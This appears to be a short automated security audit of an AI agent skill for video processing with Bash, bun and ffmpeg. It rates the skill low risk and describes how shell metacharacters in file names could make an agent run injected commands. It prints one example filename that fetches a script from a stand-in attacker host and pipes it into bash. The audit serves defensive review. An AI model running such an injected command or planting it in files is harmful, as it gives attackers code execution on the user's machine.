video-processing
Pass
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: SAFECOMMAND_EXECUTION
Full Analysis
- [COMMAND_EXECUTION] (LOW): The skill facilitates the execution of shell commands through the
Bash(bun:*)andBash(ffmpeg:*)tools. It constructs commands based on user-provided file paths and directory inputs. - [INDIRECT_PROMPT_INJECTION] (LOW): The skill is susceptible to command injection via malicious filenames (Indirect Prompt Injection).
- Ingestion points: The skill accepts file paths, directory names, and glob patterns (e.g.,
*.mov) as arguments. - Boundary markers: No boundary markers or specific instruction delimiters are used to separate input data from the command template.
- Capability inventory: The skill uses
Bashwithbunandffmpegpermissions. This allows for file system interaction and process execution across the host environment. - Sanitization: There is no evidence of filename sanitization or escaping logic. If a file is named with shell metacharacters (e.g.,
file; curl http://attacker.com/sh | bash;.mp4), the agent might inadvertently execute the injected payload when processing the file list. - [EXTERNAL_DOWNLOADS] (SAFE): While the skill suggests installing FFmpeg via
brew install ffmpeg, this is a standard system package manager recommendation and does not constitute an automated or untrusted remote download during skill execution.
Audit Metadata